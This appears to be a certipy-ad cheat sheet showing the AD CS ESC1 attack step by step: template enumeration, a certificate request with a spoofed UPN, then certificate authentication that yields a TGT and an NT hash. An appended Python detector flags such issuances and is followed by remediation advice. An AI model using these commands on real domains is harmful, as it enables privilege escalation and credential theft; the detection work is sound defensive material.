certipy-ad

Enumerate AD CS:

The attacker runs certipy find to discover any vulnerable configuration.

certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -text -enabled -hide-admins

Request a certificate:

Suppose the find output shows ESC1 on a template that domain users can enroll in. The attacker can try to exploit it:

certipy-ad req -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -target 'CA.CORP.LOCAL' -ca 'CORP-CA' -template '<UserTemplate>' -upn '<user>@<domain>' -sid '<sid>'

[*] Requesting certificate via RPC
[*] Request ID is 1
[*] Successfully requested certificate
[*] Got certificate with UPN '<user>@<domain>'
[*] Certificate object SID is '<sid>'
[*] Wrote certificate and private key to '<user>.pfx'

Authenticate with the certificate:

certipy-ad auth -pfx '<user>.pfx' -dc-ip '<ip>'

[*] Certificate identities:
    SAN UPN: '<user>@<domain>'
    Security Extension SID: '<sid>'
[*] Using principal: '<user>@<domain>'
[*] Trying to get TGT...
[*] Got TGT
[*] Wrote credential cache to '<user>.ccache'
[*] Trying to retrieve NT hash for '<user>'
[*] Got hash for '<user>@<domain>':
    aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
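From the defender's side, the request step above is visible because the requester supplies an arbitrary -upn that does not belong to the enrolling account. The following is an added detection example, not part of the original page or of certipy: it assumes issuance events have already been normalized into requester / template / san fields (a simplified, assumed shape of what AD CS audit event 4887 plus the issued certificate's SAN provide) and flags every issued certificate whose SAN UPN names a principal other than the requester.

```python
"""Added example (not from the original page): flag AD CS issuance events whose
requester-supplied SAN UPN does not match the requesting account, the tell-tale
of the ESC1 request shown above (-upn pointed at another principal).
Event records are constructed; their field names are an assumption, not the
exact layout of event 4887."""
import re

# Constructed sample events: hypothetical domain CORP.LOCAL, hypothetical accounts.
SAMPLE_EVENTS = [
    {"event_id": 4887, "requester": "CORP\\jdoe", "template": "User",
     "san": ""},                                   # no SAN override: benign
    {"event_id": 4887, "requester": "CORP\\jdoe", "template": "VulnTemplate",
     "san": "upn=administrator@corp.local"},        # ESC1 pattern
    {"event_id": 4887, "requester": "CORP\\jdoe", "template": "VulnTemplate",
     "san": "upn=jdoe@corp.local"},                 # SAN matches requester: benign
]

SAN_UPN_RE = re.compile(r"upn=([^\s,;]+)", re.IGNORECASE)

def requested_upn(event):
    """Return the UPN carried in the SAN, or None when no UPN SAN was supplied."""
    m = SAN_UPN_RE.search(event.get("san", ""))
    return m.group(1).lower() if m else None

def expected_upn(requester, domain_map):
    """Map a DOMAIN\\sam requester to the UPN it would legitimately receive.
    domain_map is an assumed NetBIOS -> DNS mapping; resolve via AD in production."""
    netbios, sam = requester.split("\\", 1)
    return f"{sam}@{domain_map[netbios]}".lower()

def find_esc1_candidates(events, domain_map):
    """Return (requester, requested_upn, template) for each issued certificate
    whose SAN UPN names a different principal than the account that requested it."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4887:
            continue
        upn = requested_upn(ev)
        if upn is None:
            continue
        if upn != expected_upn(ev["requester"], domain_map):
            findings.append((ev["requester"], upn, ev["template"]))
    return findings

if __name__ == "__main__":
    for hit in find_esc1_candidates(SAMPLE_EVENTS, {"CORP": "corp.local"}):
        print("ESC1 candidate: %s obtained a certificate for %s via template %s" % hit)
```

A hit on a template that also allows client authentication is the combination to act on: revoke the certificate, fix the template (no ENROLLEE_SUPPLIES_SUBJECT, or require manager approval), and review who else enrolled.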
